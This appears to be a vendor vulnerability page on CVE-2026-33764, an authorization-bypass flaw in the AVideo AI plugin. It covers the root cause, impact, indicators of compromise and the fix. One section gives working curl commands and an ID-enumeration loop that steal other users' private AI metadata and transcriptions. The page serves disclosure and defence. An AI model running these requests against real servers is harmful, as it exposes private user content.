CVE-2026-33764: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33764 is an Insecure Direct Object Reference (IDOR) vulnerability in the AI plugin of WWBN AVideo, a self-hosted video platform. The flaw allows authenticated users with canUseAI permission to steal AI-generated metadata and full transcriptions (VTT subtitles) from other users' private videos by manipulating sequential integer IDs in the save.json.php endpoint. All AVideo versions up to and including 26.0 are affected. The vulnerability was published on March 24, 2026, and carries a CVSS v3.1 base score of 4.3 (Moderate) (GitHub Advisory, AVideo Security Advisory).

Technical details

The root cause is CWE-639 (Authorization Bypass Through User-Controlled Key): the plugin/AI/save.json.php endpoint correctly verifies that the requesting user can edit the target video (Video::canEdit($videos_id)), but then loads the AI response object using a completely separate, attacker-controlled $_REQUEST['id'] parameter with no ownership check. The underlying ObjectYPT base class constructor performs a plain SELECT * WHERE id = ? database lookup with no permission validation, so any valid integer ID resolves to any user's AI response. The loaded content — titles, descriptions, keywords, summaries, or VTT transcriptions — is then applied to the attacker's own video via $video->setTitle(), $video->setDescription(), or file_put_contents(). Notably, the sibling delete.json.php endpoint correctly validates ownership by traversing to the parent Ai_responses record, confirming the omission in save.json.php was unintentional (AVideo Security Advisory).

Impact

Successful exploitation results in a confidentiality breach of private video content: an attacker can exfiltrate complete VTT transcriptions revealing the full spoken content of private videos without ever accessing the video files themselves. Additionally, all AI-generated metadata — titles, descriptions, keywords, summaries, and content ratings — from any user's private video can be read. Because AI response IDs are sequential integers, a single attacker can systematically enumerate and harvest all AI-generated content across the entire platform. There is no integrity or availability impact, and no lateral movement beyond data disclosure is possible (GitHub Advisory).

Exploitability

A proof-of-concept exploit consisting of concrete curl commands is publicly available in the official security advisory, demonstrating metadata theft and full transcription exfiltration with a simple shell loop (AVideo Security Advisory). The barrier to exploitation is low: any authenticated user with canUseAI permission and at least one owned video can exploit this without admin access. The EPSS score is approximately 0.021–0.032%, indicating a low but non-zero probability of exploitation in the wild within 30 days. There is no evidence of in-the-wild exploitation or threat actor attribution at this time, and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).

Exploitation steps

  1. Prerequisite setup: Obtain two accounts on the target AVideo instance — an attacker account and a victim account — both with canUseAI permission. The attacker must own at least one video (e.g., video ID 5). The victim must have previously generated AI metadata or transcriptions for a private video.
  2. Enumerate AI response IDs: Since AI response IDs are sequential integers, the attacker iterates through IDs starting from 1 to identify valid responses belonging to other users:
for id in $(seq 1 100); do
  curl -s -b "attacker_cookies" \
    "https://target.example/plugin/AI/save.json.php" \
    -d "videos_id=5&ai_metatags_responses_id=1&id=${id}&label=videoTitles&index=0"
done
  1. Steal AI-generated metadata: Once a victim's AI metatags response ID (e.g., 42) is identified, the attacker applies it to their own video to read the stolen title:
curl -b "attacker_cookies" \
  "https://target.example/plugin/AI/save.json.php" \
  -d "videos_id=5&ai_metatags_responses_id=1&id=42&label=videoTitles&index=0"

The victim's AI-generated title is now applied to the attacker's video (ID 5) and can be read back. 4. Steal full transcription (VTT): Target the transcription path using the victim's AI transcription response ID (e.g., 17):

curl -b "attacker_cookies" \
  "https://target.example/plugin/AI/save.json.php" \
  -d "videos_id=5&ai_transcribe_responses_id=1&id=17&label=text"

The victim's VTT subtitle file is written to the attacker's video directory, and the attacker retrieves the full spoken content by requesting the VTT file for their own video (AVideo Security Advisory).

Indicators of compromise

  • Network: Repeated POST requests to /plugin/AI/save.json.php from a single user account with rapidly incrementing id parameter values (sequential integer enumeration); requests where videos_id consistently references the attacker's own video but id spans a wide range of integers.
  • Logs: Web server access logs showing high-frequency requests to save.json.php with varying id values from the same session/IP; HTTP 200 responses to requests where videos_id and the resolved AI response's videos_id do not match (pre-patch behavior).
  • File System: Unexpected VTT subtitle files appearing in a user's video directory that do not correspond to that user's own AI transcription jobs; metadata fields (title, description, keywords) on a user's video being overwritten with content from another user's private video.
  • Application Behavior: A user's video metadata changing to content inconsistent with the video's actual content, suggesting it was overwritten with stolen AI-generated data from another video (AVideo Security Advisory).

Mitigation and workarounds

The fix is available in commit aa2c46a806960a0006105df47765913394eec142, which adds ownership validation in save.json.php for both the metatags and transcription paths by loading the parent Ai_responses record and verifying getVideos_id() matches the provided $videos_id — mirroring the correct logic already present in delete.json.php (AVideo Patch Commit). Administrators should update AVideo to version 26.1 or later as soon as possible. As interim mitigations, restrict the canUseAI permission to only trusted users, implement rate limiting on the /plugin/AI/save.json.php endpoint, and review access logs for evidence of sequential ID enumeration (AVideo Security Advisory).

Community reactions

The vulnerability was reported by a researcher credited as "offset" in the GitHub security advisory and was published by the AVideo maintainer (DanielnetoDotCom) on March 24, 2026. A brief write-up was noted on infinitsec.net shortly after disclosure. No significant broader media coverage or notable community debate has been identified beyond standard vulnerability database aggregation (AVideo Security Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management